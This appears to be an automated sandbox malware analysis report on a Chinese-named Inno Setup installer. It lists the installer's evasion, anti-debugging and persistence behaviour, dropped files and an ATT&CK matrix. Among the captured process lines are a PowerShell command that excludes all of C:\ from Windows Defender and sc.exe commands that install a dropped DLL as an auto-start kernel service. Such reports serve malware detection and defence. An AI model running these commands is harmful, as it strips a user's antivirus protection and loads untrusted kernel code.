Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6235	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Window / User API: threadDelayed 621	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Window / User API: threadDelayed 621	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Window / User API: threadDelayed 576	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac	Jump to dropped file

Source: C:\Program Files (x86)\Windows NT\7zr.exe

API coverage: 7.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 6235 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 3448 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDCB430 FindFirstFileA,FindClose,FindClose,		6_2_6CDCB430
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00756868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		10_2_00756868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00757496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00757496

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00759C60 GetSystemInfo,

10_2_00759C60

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000002.00000002.1404286591.000000000078D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Code function: 6_2_6CC53886 NtSetInformationThread 00000000,00000011,00000000,00000000

6_2_6CC53886

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Code function: 6_2_6CDE06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6CDE06F1

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_007D57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_007D57D0

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDDF6ED mov eax, dword ptr fs:[00000030h]	6_2_6CDDF6ED
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDEA2D6 mov eax, dword ptr fs:[00000030h]	6_2_6CDEA2D6
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDEA2A5 mov eax, dword ptr fs:[00000030h]	6_2_6CDEA2A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDE06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_6CDE06F1
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_6CDD922D

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"			Jump to behavior

Found driver which could be used to inject code into processes

Source: tProtect.dll.12.dr

Static PE information: Found potential injection code

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_007F0320 cpuid

10_2_007F0320

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_0075AB2A GetSystemTimeAsFileTime,

10_2_0075AB2A

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_007F0090 GetVersion,

10_2_007F0090

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Service Execution	1 DLL Side-Loading	1 Windows Service	1 Disable or Modify Tools	LSASS Memory	421 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	111 Process Injection	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U5b89#U88c5#U52a9#U624b2.0.6.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Windows NT\7zr.exe	0%	ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc	24%	ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll	9%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac	24%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac	24%	ReversingLabs

Name	Source	Malicious	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	#U5b89#U88c5#U52a9#U624b2.0.6.exe	false	high
https://www.remobjects.com/ps	#U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1375401020.000000007ED5B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1374701249.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000002.00000000.1376888852.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000000.1397917138.0000000000E5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	false	high
https://www.innosetup.com/	#U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1375401020.000000007ED5B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1374701249.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000002.00000000.1376888852.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000000.1397917138.0000000000E5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580397
Start date and time:	2024-12-24 13:02:13 +01:00
Joe Sandbox product:	CloudBasic
